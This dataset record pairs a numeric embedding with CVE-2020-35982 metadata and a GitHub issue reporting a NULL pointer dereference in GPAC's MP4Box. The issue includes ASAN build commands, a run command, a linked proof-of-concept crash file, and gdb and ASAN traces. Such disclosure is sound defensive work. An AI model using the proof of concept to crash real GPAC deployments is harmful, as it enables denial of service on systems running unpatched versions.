-0.010947471484541893, -0.005394770298153162, 0.03905196115374565, 0.013897904194891453, 0.012813924811780453, -0.00009175237210001796, -0.015491568483412266, 0.0015730259474366903, 0.024766409769654274, 0.014802416786551476, 0.010918756015598774, -0.002175136934965849, -0.015434139408171177, 0.0149316331371665, -0.01102643646299839, -0.02328760363161564, -0.016970375552773476, -0.008047288283705711, 0.018004102632403374, 0.009655310772359371, 0.0052045355550944805, 0.02153600938618183, 0.001783002051524818, -0.005915223620831966, -0.025771424174308777, 0.009633774869143963, -0.008894371800124645, -0.005502450279891491, -0.01923883520066738, -0.005599362310022116, 0.002316915662959218, 0.022282591089606285, 0.012742138467729092, -0.03485962003469467, 0.01239756215363741, 0.013876368291676044, 0.00019315107783768326, -0.01092593465000391, 0.01804717443883419, 0.0025466331280767918, -0.010610073804855347, 0.0007519656210206449, -0.003445761278271675, -0.019798770546913147, -0.01758773997426033, 0.00024026109895203263, 0.0061951917596161366, 0.003562414785847068, -0.014630128629505634, 0.029949409887194633, -0.014608592726290226, -0.0030329879373311996, -0.011722767725586891, 0.000048988811613526195, -0.026173429563641548, -0.01936805061995983, -0.01613764837384224, 0.027278944849967957, -0.01685551553964615, -0.0008152276859618723, -0.019454194232821465, 0.01286417618393898, 0.017243163660168648, -0.014185051433742046, -0.007551960181444883, -0.007831928320229053, -0.015175707638263702, 0.0035283160395920277, 0.0037831589579582214, -0.0030365772545337677, -0.0077170697040855885, 0.00492456741631031, 0.003216044045984745, -0.007925251498818398, 0.024924341589212418, 0.014235301874577999, -0.022756382822990417, 0.0024694623425602913, 0.007946787402033806, -0.010954650118947029, -0.019999774172902107, -0.037242937833070755, -0.022670239210128784, 0.0006985742948018014, -0.0275660902261734, -0.017889244481921196, -0.002460489049553871, 0.019870556890964508, -0.008908729068934917, -0.01338103972375393, -0.01626686565577984, 0.010509571991860867, 0.02073199860751629, 0.026991797611117363, -0.0022630756720900536, 0.008341614156961441, -0.0043933456763625145, 0.015175707638263702, -0.02269895374774933, -0.0027566091157495975, -0.008327256888151169, -0.006055207923054695, -0.00797550193965435, 0.008162147365510464, 0.0006662702653557062, -0.0027350732125341892, 0.020961714908480644, 0.006511053070425987, 0.0002438504307065159, 0.033624887466430664, 0.001127948402427137, -0.02815474197268486, -0.012756495736539364, 0.026403145864605904, 0.009892206639051437, -0.017544668167829514, 0.023531679064035416, 0.0018081273883581161, 0.00783910695463419, -0.009705561213195324, 0.007167901378124952, -0.0015649499837309122, -0.04476618394255638, -0.02383318357169628, -0.009762990288436413, 0.001151279080659151, -0.015333638526499271, 0.0017273674020543694, -0.0070027923211455345, 0.025024842470884323, 0.010107566602528095, 0.004188753664493561, 0.008915907703340054, 0.002056688768789172, 0.011457156389951706, -0.0021320648957043886, 0.006654626689851284, 0.0010301390429958701, 0.0025215076748281717, 0.004023644141852856, -0.002774555701762438, -0.00830572098493576, 0.015233136713504791, -0.012821103446185589, 0.0007461329805664718, -0.0054306634701788425, -0.002954022493213415, 0.010351641103625298, -0.004206700250506401, 0.00027525710174813867, 0.0028786465991288424, -0.008908729068934917, -0.008657475933432579, 0.01810460537672043, 0.012131951749324799, 0.008492366410791874, 0.008083182387053967, -0.0052045355550944805, 0.009540451690554619, -0.01516135036945343, -0.018205106258392334, -0.0037759800907224417, 0.01608021929860115, 0.03230401128530502, -0.00797550193965435, -0.021248862147331238, 0.0067946105264127254, -0.019655197858810425, 0.026360074058175087, 0.013330789282917976, -0.008858478628098965, -0.0183773934841156, 0.0013352325186133385, 0.011442799121141434, 0.004597937688231468, -0.007261224091053009, -0.02028691954910755, 0.006166477221995592, 0.011019257828593254, -0.014960347674787045, 0.008987694047391415, 0.010861326940357685, -0.009432772174477577, 0.008815405890345573, -0.0010741084115579724, 0.0054701464250683784, 0.015146993100643158, 0.018219463527202606, 0.015190064907073975, -0.004565633833408356, 0.010035780258476734, 0.00892308633774519, -0.012950319796800613, -0.0127636743709445, -0.010437785647809505, 0.0018646593671292067, 0.015505926683545113, 0.0032824466470628977, -0.022943027317523956, -0.010523929260671139, -0.010473678819835186, 0.014902917668223381, 0.0015093153342604637, -0.001270624459721148, 0.02558477781713009, 0.006392605137079954, -0.0006308255833573639, 0.006970488000661135, 0.004106198903173208, 0.005261964630335569, -0.0009861696744337678, 0.019655197858810425, -0.0070638107135891914, 0.010121923871338367, -0.0138476537540555, -0.007910894230008125, 0.001264343154616654, 0.0032537318766117096, -0.013610757887363434, 0.005387591663748026, -0.03641021251678467, 0.006697698496282101, -0.009691203944385052, 0.004113377537578344, -0.00102565239649266, -0.0026435451582074165, -0.0000839567874209024, 0.02172265388071537, -0.02755173295736313, 0.008154968731105328, -0.018334321677684784, 0.007429922930896282, 0.0326773039996624, 0.013689722865819931, -0.0016286607133224607, 0.007315064314752817, -0.009224590845406055, -0.014063013717532158, 0.00944712944328785, -0.007602211087942123, 0.010531107895076275, 0.011844804510474205, -0.01249806396663189, -0.02565656416118145, 0.006166477221995592, -0.023574750870466232, -0.030695991590619087, -0.005753703881055117, 0.019138332456350327, -0.03885095939040184, -0.0034188413992524147, 0.005419895518571138, 0.002397675532847643, 0.0026543131098151207, -0.010918756015598774, -0.023373747244477272, 0.0037723907735198736, 0.02225387655198574, -0.00536605529487133, -0.0010938497725874186, 0.007523245643824339, 0.012519599869847298, 0.004684081766754389, -0.006335176061838865, -0.024622837081551552, 0.005943938624113798, 0.0313851423561573, -0.011966842226684093, -0.000014413422832149081, 0.009762990288436413, 0.0018969634547829628, -0.024062899872660637, 0.017831815406680107, 0.0036395855713635683, 0.0185066107660532, 0.0003432301455177367, -0.005875741131603718, -0.01653965376317501, -0.018750684335827827, 0.007358136121183634, -0.005861383862793446, 0.01421376597136259, -0.0091886967420578, 0.014055835083127022, -0.011938127689063549, -0.000893744349014014, -0.021622152999043465, 0.011471513658761978, 0.007429922930896282, -0.014673200435936451, -0.024507977068424225, 0.007132008206099272, 0.03058113157749176, 0.016309937462210655, -0.005803954321891069, -0.019382407888770103, 0.007271992042660713, 0.020516637712717056, 0.029087968170642853, 0.010358819738030434, -0.013452826999127865, -0.0038262309972196817, -0.014974704943597317, -0.011966842226684093, 0.012483706697821617, 0.006421320140361786, 0.017630811780691147, 0.01023678295314312, -0.001265240483917296, 0.0009673257009126246, 0.005111212842166424, -0.024134686216711998, 0.008736440911889076, -0.010854148305952549, 0.012368847616016865, -0.012562671676278114, 0.002681232988834381, -0.002704563783481717, 0.01214630901813507, -0.0063028717413544655, 0.003941089380532503, -0.010279854759573936, -0.00892308633774519, -0.0004966742126271129, -0.030868278816342354, -0.016755014657974243, 0.0005016095237806439, -0.010351641103625298, 0.016482224687933922, -0.007315064314752817, -0.016841158270835876, 0.023072244599461555, 0.01890861615538597, -0.006403373088687658, -0.011686873622238636, 0.0006662702653557062, 0.004386167041957378, 0.0059224022552371025, -0.0011046177241951227, -0.0061951917596161366, -0.0011916591320186853, 0.01323028840124607, -0.004691260401159525, 0.008076002821326256, 0.029489975422620773, 0.01778874360024929, -0.0011288458481431007, 0.008844121359288692, 0.03414175286889076, 0.0027889132034033537, 0.019899271428585052, 0.021837512031197548, -0.006141352001577616, 0.003819052129983902, 0.002069251611828804, 0.0137830451130867, 0.016037147492170334, -0.028528032824397087, 0.0034026894718408585, -0.005143516696989536, -0.004971228539943695, 0.01446501910686493, -0.0014841898810118437, -0.0010579564841464162, 0.009590702131390572, -0.0016528887208551168, 0.00938252080231905, 0.011801732704043388, -0.025900639593601227, -0.007673997897654772, 0.005279911682009697, -0.00662591215223074, -0.01686987280845642, -0.006895112339407206, 0.000632620241958648, 0.014098906889557838, 0.004849191289395094, 0.0025681690312922, -0.0020620727445930243, 0.0007308783242478967, 0.00948302261531353, -0.021909300237894058, -0.007544781547039747, -0.005376823712140322, 0.0031263106502592564, 0.00801139511168003, -0.012210916727781296, -0.011227439157664776, 0.0334526002407074, -0.008571331389248371, 0.038879673928022385, 0.008355971425771713, 0.010631609708070755, -0.012318597175180912, 0.0149316331371665, 0.0013262592256069183, -0.031011853367090225, 0.013266181573271751, 0.004195932298898697, 0.015089563094079494, 0.0022253876086324453, -0.006159298587590456, -0.00048141952720470726, 0.010150638408958912, -0.00487431650981307, 0.0038908389396965504, 0.014658843167126179, 0.0014832925517112017, 0.020459208637475967, -0.0030276039615273476, 0.002930691931396723, 0.007738605607300997, -0.007045864127576351, 0.007268402725458145, -0.0027278943452984095, -0.018851187080144882, 0.005829079542309046, 0.030408844351768494, -0.032189153134822845, 0.012734959833323956, -0.01421376597136259, 0.005459378007799387, -0.020358707755804062, 0.007293528411537409, 0.02119143307209015, -0.018219463527202606, -0.018879901617765427, -0.009439950808882713, 0.0003950511454604566, 0.007997037842869759, 0.02100478671491146, 0.013201572932302952, -0.0011710204416885972, 0.000255964434472844, 0.008571331389248371, -0.004339505918323994, 0.009856313467025757, -0.0026399558410048485, -0.012196559458971024, -0.0029899158980697393, -0.007444280199706554, 0.008750798180699348, -0.00984913483262062, -0.015850502997636795, -0.012526778504252434, -0.029576119035482407, 0.014974704943597317, 0.01626686565577984, 0.024493619799613953, -0.010143459774553776, -0.02651800587773323, -0.0010848764795809984, 0.011952484957873821, 0.01200991403311491, 0.0020997608080506325, 0.0034224307164549828, -0.005775239784270525, -0.0010660324478521943, -0.016956018283963203, 0.003497806843370199, 0.015793073922395706, 0.0005150695214979351, -0.011607908643782139, 0.001923883450217545, 0.012634458020329475, 0.0069561307318508625, 0.012691888026893139, -0.000012149056601629127, 0.021693939343094826, 0.010365999303758144, -0.010969007387757301, -0.003722140099853277, 0.0018341500544920564, -0.0035552361514419317, 0.002973763970658183, -0.009454308077692986, -0.02014334686100483, 0.02060278132557869, -0.04496718570590019, 0.016051504760980606, -0.0036647107917815447, -0.026690293103456497, 0.011385370045900345, -0.0032788573298603296, 0.012519599869847298, -0.006751538719981909, 0.01745852455496788, -0.009081017225980759, 0.0010552643798291683, 0.006654626689851284, -0.0319020077586174, 0.0047774044796824455, -0.00006909469811944291, 0.003092211904004216, 0.004425649996846914, 0.00045270484406501055, -0.00041232482180930674, -0.0006505669443868101, 0.0005424382397904992, -0.01207452267408371, 0.0017148046754300594, -0.003919553477317095, -0.0009332270710729063, -0.0009233563905581832, 0.00613417336717248, 0.011708410456776619, 0.0003939294838346541, 0.019770056009292603, 0.016812443733215332, -0.0023438355419784784, -0.00718584842979908, 0.011292046867311, -0.0008197143324650824, -0.001401635236106813, -0.002451515756547451, 0.001534440671093762, -0.010538286529481411, -0.02604421228170395, -0.009246126748621464, -0.01469473633915186, -0.007997037842869759, 0.0010776977287605405, -0.013876368291676044, -0.007167901378124952, -0.0014482965925708413, -0.024579765275120735, 0.008442115038633347, -0.019138332456350327, -0.0002970174537040293, 0.00534810870885849, 0.0073796724900603294, 0.007232509553432465, 0.006209549028426409, -0.010624431073665619, 0.004694849718362093, -0.0005855102208442986, 0.0004962255479767919, 0.01653965376317501, 0.0015559765743091702, 0.00915280357003212, 0.000048988811613526195, 0.0002445234276819974, 0.027523018419742584, -0.02251230739057064, -0.012677530758082867, 0.029375115409493446, 0.0009359190589748323, -0.009863492101430893, -0.014185051433742046, -0.01738673821091652, 0.008686190471053123, -0.0209330003708601, 0.011787375435233116, -0.021837512031197548, 0.007053042761981487, 0.003079649293795228, 0.026934368535876274, 0.009841956198215485, 0.006155709270387888, -0.0027925025206059217, -0.014888560399413109, 0.001161149819381535, 0.019468551501631737, -0.006938184145838022, 0.019899271428585052, 0.0064141410402953625, -0.008327256888151169, -0.0016241739504039288, 0.005322983488440514, -0.008147790096700191, 0.015606427565217018, -0.006708466913551092, -0.01197402086108923, 0.004457953851670027, -0.007408387027680874, -0.00769553380087018, 0.008521080948412418, 0.014005584642291069, 0.005254785995930433, 0.004766636528074741, 0.024177759885787964, -0.004770225845277309, -0.002315121004357934, 0.003070676000788808, 0.015003419481217861, -0.007401208393275738, -0.004723564721643925, -0.007989859208464622, 0.005165052600204945, 0.005462967325001955, -0.002074635587632656, -0.00666180532425642, 0.0015631553251296282, -0.007081757299602032, -0.02152165211737156, -0.013840475119650364, 0.003880070988088846, -0.005003532860428095, -0.012813924811780453, -0.005290679633617401, 0.019109617918729782, 0.007997037842869759, 0.01325182430446148, -0.004160039126873016, 0.0010597511427477002, -0.0004634728538803756, -0.012038628570735455, 0.003851356217637658, -0.02328760363161564, -0.02604421228170395, -0.03543391451239586, -0.0036252280697226524, -0.009784526191651821, -0.002528686309233308, -0.01593664661049843, -0.004005697555840015, -0.03006426803767681, 0.004630242008715868, -0.01916704699397087, 0.00787500012665987, 0.0179897453635931, -0.010595716536045074, -0.0032860359642654657, 0.007300707045942545, 0.010552644729614258, -0.03158614784479141, 0.01646786741912365, -0.0029988891910761595, 0.020100275054574013, 0.013897904194891453, -0.027680950239300728, -0.0002234360872535035, 0.006665394641458988, 0.002178726252168417, -0.0030114518012851477, 0.0035552361514419317, -0.0009197670151479542, 0.01995670050382614, 0.022469235584139824, 0.0053158048540353775, -0.004565633833408356, 0.011457156389951706, -0.010172175243496895, 0.0011862751562148333, 0.0008358663180842996, -0.012986212968826294, 0.012971855700016022, 0.008887193165719509, -0.008621581830084324, 0.018291249871253967, -0.004791761748492718, 0.02466590888798237, 0.002460489049553871, 0.004522562026977539, -0.0064141410402953625, -0.002045920817181468, -0.008700547739863396, 0.0008816303452476859, 0.005283500999212265, 0.02166522480547428, 0.0043969349935650826, 0.018549682572484016, -0.023445535451173782, -0.00043655282934196293, 0.009913742542266846, -0.006342354696244001, -0.024450547993183136, -0.010358819738030434, -0.004106198903173208, -0.017013447359204292, -0.0011746097588911653, -0.016223793849349022, -0.004608705639839172, -0.02198108658194542, -0.009985529817640781, -0.026345716789364815, -0.00401646550744772, 0.02644621953368187, 0.016582727432250977, 0.006615144200623035, 0.015118278563022614, 0.047092072665691376, 0.000010038920663646422, -0.005434252787381411, -0.015721285715699196, 0.016439152881503105, -0.003840588266029954, -0.0028840305749326944, -0.02067456766963005, -0.005764471832662821, 0.004565633833408356, 0.00869336910545826, -0.014529626816511154, -0.0030940065626055002, 0.014874203130602837, 0.0070027923211455345, -0.015118278563022614, 0.0032806519884616137, -0.002255896804854274, -0.006532589439302683, -0.00089194969041273, -0.003603692166507244, 0.007638104259967804, 0.001539824646897614, -0.0037652121391147375, 0.005933170206844807, 0.00534810870885849, 0.010523929260671139, -0.004454364534467459, 0.021679582074284554, 0.022655881941318512, 0.012246809899806976, 0.013718437403440475, 0.0031478465534746647, -0.0063028717413544655, -0.00741556566208601, 0.0054234848357737064, 0.009303555823862553, 0.013574863784015179, 0.015922289341688156, 0.0068448614329099655, -0.02120579034090042, 0.001149484422057867, 0.01620943658053875, -0.004145681858062744, 0.010380356572568417, 0.018492253497242928, -0.01469473633915186, 0.0055885943584144115, -0.020100275054574013, 0.017042161896824837, 0.006719234865158796, -0.0019436248112469912, 0.00152995390817523, -0.009095374494791031, 0.027451232075691223, 0.04333044961094856, 0.00664385873824358, 0.014321445487439632, -0.00830572098493576, 0.008334435522556305, -0.017501596361398697, -0.022268233820796013, 0.026561077684164047, -0.009899385273456573, -0.006428498774766922, 0.0010741084115579724, -0.014543984085321426, -0.009892206639051437, -0.0008879117085598409, 0.007602211087942123, -0.001399840577505529, 0.02236873470246792, 0.002212824998423457, -0.03129899874329567, 0.0035157534293830395, 0.007810392417013645, -0.012311418540775776, 0.014630128629505634, 0.01646786741912365, 0.012935962527990341, -0.0069525414146482944, 0.017472881823778152, -0.009138446301221848, -0.0072253309190273285, 0.010545465163886547, -0.011248975060880184, 0.007681176532059908, -0.016568370163440704, -0.0035516468342393637, -0.009928099811077118, -0.02317274548113346, 0.007932430133223534, 0.0076093897223472595, -0.007429922930896282, 0.009339448995888233, -0.02664722129702568, 0.0008609916549175978, 0.0011808911804109812, -0.005111212842166424, 0.013122607953846455, 0.004332327283918858, -0.012892890721559525, -0.0037939269095659256, -0.03425661101937294, 0.014192230068147182, 0.005491682328283787, -0.0006007649353705347, -0.017171377316117287, 0.01020088978111744, 0.013467184267938137, 0.018793756142258644, -0.0020836088806390762, 0.003052729181945324, 0.006202370394021273, -0.011859161779284477, 0.013079536147415638, 0.001144997775554657, -0.001157560502178967, 0.022397449240088463, 0.014228123240172863, 0.02938947267830372, -0.020918643102049828, -0.0003073367988690734, 0.006546946708112955, 0.007573496550321579, 0.00944712944328785, -0.033251598477363586, -0.006945362780243158, 0.0038011055439710617, 0.016841158270835876, -0.005060961935669184, -0.005721399560570717, 0.004343095235526562, -0.0047056181356310844, 0.00283916387706995, 0.010559823364019394, -0.011478692293167114, 0.01118436735123396, 0.0014626539777964354, 0.005832668859511614, 0.010437785647809505, -0.005437842104583979, 0.015649499371647835, -0.001278700539842248, 0.01587921753525734, -0.023316318169236183, -0.019913628697395325, -0.018477896228432655, 0.01516135036945343, 0.007099704351276159, 0.014493733644485474, -0.020301276817917824, 0.015261851251125336, -0.002146422164514661, -0.03523290902376175, 0.0066833412274718285, 0.006295693106949329, 0.002291790209710598, 0.016755014657974243, -0.005721399560570717, 0.03256244584918022, 0.023316318169236183, -0.006048029288649559, 0.018736327067017555, -0.02572835236787796, -0.005556290037930012, -0.025843210518360138, -0.011378191411495209, 0.004020054824650288, -0.00539835961535573, -0.0031263106502592564, 0.010897220112383366, -0.036381497979164124, -0.004081073682755232, 0.000648323621135205, 0.025613492354750633, 0.012842640280723572, -0.0006505669443868101, -0.002532275626435876, -0.0018718381179496646, -0.01050239335745573, 0.006791021209210157, 0.009073838591575623, 0.002840958535671234, -0.009303555823862553, 0.007009970955550671, -0.005656791850924492, -0.012620100751519203, -0.004569223150610924, 0.0500209704041481, 0.00541630620136857, 0.01093311421573162, -0.004572812467813492, -0.01023678295314312, 0.003465502755716443, -0.01712830550968647, -0.0026255983393639326, -0.02867160551249981, 0.03058113157749176, 0.011995556764304638, 0.0011333324946463108, 0.022095944732427597, -0.01778874360024929, -0.009016408585011959, -0.004429239314049482, -0.0024999717716127634, -0.0056783277541399, -0.006292103789746761, -0.011945306323468685, -0.019583411514759064, 0.00769553380087018, 0.036783501505851746, -0.008707726374268532, 0.017946673557162285, 0.012469349429011345, -0.016783729195594788, -0.009698382578790188, 0.02284252643585205, 0.0036449695471674204, 0.015994075685739517, -0.010918756015598774, -0.005053783301264048, 0.0127636743709445, 0.0020297688897699118, -0.01804717443883419, 0.016683228313922882, 0.008707726374268532, 0.01295749843120575, -0.019870556890964508, 0.01155047956854105, 0.017702599987387657, -0.00487431650981307, 0.002821217058226466, -0.000517761567607522, -0.005287090316414833, -0.00928919855505228, -0.00032685379846952856, 0.017932316288352013, 0.010459321551024914, 0.021162718534469604, -0.006442856043577194, 0.008872835896909237, 0.00025798342539928854, 0.0011333324946463108, -0.00882258452475071, 0.004213878884911537, -0.00004537143468041904, -0.0014536805683746934, -0.021105289459228516, -0.007587853819131851, -0.009282019920647144, -0.0014294525608420372, 0.0018054354004561901, -0.026144715026021004, -0.0036647107917815447, -0.0034870386589318514, 0.033624887466430664, -0.007268402725458145, 0.009066659957170486, 0.015218779444694519, -0.0023312729317694902, -0.003959036432206631, -0.008119075559079647, 0.00436463113874197, -0.009741454385221004, 0.009956814348697662, -0.011227439157664776, 0.012541135773062706, -0.0029683797620236874, -0.0026040624361485243, -0.004985585808753967, 0.003465502755716443, -0.011170010082423687, 0.0004885981907136738, -0.010710574686527252, -0.021708296611905098, -0.005355287343263626, -0.007164312060922384, 0.036927077919244766, 0.004041591193526983, -0.00009186453826259822, -0.010703396052122116, -0.005290679633617401, 0.012512421235442162, -0.013402575626969337, -0.02264152467250824, -0.005165052600204945, -0.00662591215223074, 0.0023851129226386547, -0.002035152865573764, 0.01092593465000391, -0.015448496676981449, -0.006094690412282944, 0.010308569297194481, -0.02664722129702568, 0.011428441852331161, 0.0026166250463575125, 0.012404740788042545, -0.011299225501716137, -0.004842012654989958, -0.017271878197789192, -0.01092593465000391, -0.011995556764304638, 0.010358819738030434, 0.014773702248930931, 0.013244645670056343, -0.002840958535671234, -0.0017345460364595056, 0.003876481670886278, 0.004174396395683289, 0.00876515544950962, 0.02671900764107704, 0.015649499371647835, -0.00025058042956516147, -0.006299282424151897, 0.010172175243496895, 0.01902347430586815, -0.009877849370241165, 0.014888560399413109, -0.004192342981696129, 0.0033093667589128017, 0.017616454511880875, 0.01666887104511261, -0.010775183327496052, 0.015994075685739517, -0.015017776750028133, 0.02172265388071537, 0.014450661838054657, -0.0017049340531229973, -0.018607111647725105, 0.05068140849471092, -0.0035175480879843235, 0.010559823364019394, -0.007289939094334841, -0.016755014657974243, -0.0008506723679602146, -0.002954022493213415, -0.005710631608963013, -0.022340020164847374, 0.03282087668776512, 0.009037945419549942, -0.006751538719981909, 0.011765839532017708, 0.009892206639051437, -0.000030172845072229393, 0.0056532020680606365, 0.005886509083211422, -0.02684822492301464, 0.017171377316117287, -0.0020943768322467804, 0.028169099241495132, 0.012131951749324799, -0.0065756612457334995, 0.012483706697821617, 0.01023678295314312, -0.0077673206105828285, -0.007106882985681295, 0.02014334686100483, 0.006895112339407206, -0.021090930327773094, 0.0038262309972196817, -0.006633090786635876, -0.0025053557474166155, 0.0021410381887108088, 0.0012185791274532676, 0.013237467035651207, 0.009181518107652664, 0.011981199495494366, 0.012476528063416481, 0.006647448055446148, -0.006087511777877808, -0.005003532860428095, 0.008657475933432579, 0.04887238144874573, -0.011134116910398006, -0.017702599987387657, -0.009971171617507935, 0.007315064314752817, -0.006331586744636297, -0.007595032453536987, -0.018937330693006516, 0.009432772174477577, 0.006654626689851284, -0.029044896364212036, 0.02040177956223488, 0.03767365962266922, 0.004368220455944538, 0.031988151371479034, 0.009303555823862553, 0.009167160838842392, -0.028772108256816864, -0.0054234848357737064, 0.014084549620747566 ]
18
CVE-2020-35982
2021-04-21T16:15:08.757000
An issue was discovered in GPAC version 0.8.0 and 1.0.1. There is an invalid pointer dereference in the function gf_hinter_track_finalize() in media_tools/isom_hinter.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/a4eb327049132359cae54b59faec9e2f14c5a619" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1660" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1660
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_hinter_track_finalize-null-pointer -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_hinter_track_finalize-null-pointer gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000060eab8 in gf_hinter_track_finalize () (gdb) bt #0 0x000000000060eab8 in gf_hinter_track_finalize () #1 0x000000000040ad7c in HintFile () #2 0x00000000004172b2 in mp4boxMain () #3 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf58) at ../csu/libc-start.c:291 #4 0x0000000000409df9 in _start () ``` ASAN info: ```C Hinting file with Path-MTU 1450 Bytes Hinting track ID 1 - Type "avc1:avc1" (H264) - BW 3 kbps ASAN:SIGSEGV ================================================================= ==20754==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000003 (pc 0x00000092e516 bp 0x7fffe5a7ede0 sp 0x7fffe5a79300 T0) #0 0x92e515 in gf_hinter_track_finalize media_tools/isom_hinter.c:970 #1 0x418f85 in HintFile /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:1448 #2 0x42bdc7 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6641 #3 0x7fd6bcc3b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/isom_hinter.c:970 gf_hinter_track_finalize ==20754==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Xiangkun Jia([email protected]) 、Marsman1996([email protected]) and Yanhao.
A NULL pointer dereference in the function gf_hinter_track_finalize in media_tools/isom_hinter.c:970
https://api.github.com/repos/gpac/gpac/issues/1660/comments
0
2020-12-15T11:59:14
2021-01-04T11:04:52Z
https://github.com/gpac/gpac/issues/1660
767,519,058
1,660
true
This is a GitHub Issue repo:gpac owner:gpac Title : A NULL pointer dereference in the function gf_hinter_track_finalize in media_tools/isom_hinter.c:970 Issue date: --- start body --- System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master c4f8bc6e and the latest V1.0.1 d8538e8) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box --extra-ldflags="-ldl -g" $ make ``` Run Command: ``` $ MP4Box -hint $gf_hinter_track_finalize-null-pointer -out /dev/null ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-c4f8bc6e_poc/gf_hinter_track_finalize-null-pointer gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000060eab8 in gf_hinter_track_finalize () (gdb) bt #0 0x000000000060eab8 in gf_hinter_track_finalize () #1 0x000000000040ad7c in HintFile () #2 0x00000000004172b2 in mp4boxMain () #3 0x00007ffff6ec7840 in __libc_start_main (main=0x409dc0 <main>, argc=5, argv=0x7fffffffdf68, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf58) at ../csu/libc-start.c:291 #4 0x0000000000409df9 in _start () ``` ASAN info: ```C Hinting file with Path-MTU 1450 Bytes Hinting track ID 1 - Type "avc1:avc1" (H264) - BW 3 kbps ASAN:SIGSEGV ================================================================= ==20754==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000003 (pc 0x00000092e516 bp 0x7fffe5a7ede0 sp 0x7fffe5a79300 T0) #0 0x92e515 in gf_hinter_track_finalize media_tools/isom_hinter.c:970 #1 0x418f85 in HintFile /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:1448 #2 0x42bdc7 in mp4boxMain /opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/applications/mp4box/main.c:6641 #3 0x7fd6bcc3b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #4 0x417638 in _start (/opt/data/yyp/fuzzsequence/test/0-day/SRC_asan/build/bin/MP4Box+0x417638) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/isom_hinter.c:970 gf_hinter_track_finalize ==20754==ABORTING ``` Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Xiangkun Jia([email protected]) 、Marsman1996([email protected]) and Yanhao. --- end body ---
2,502
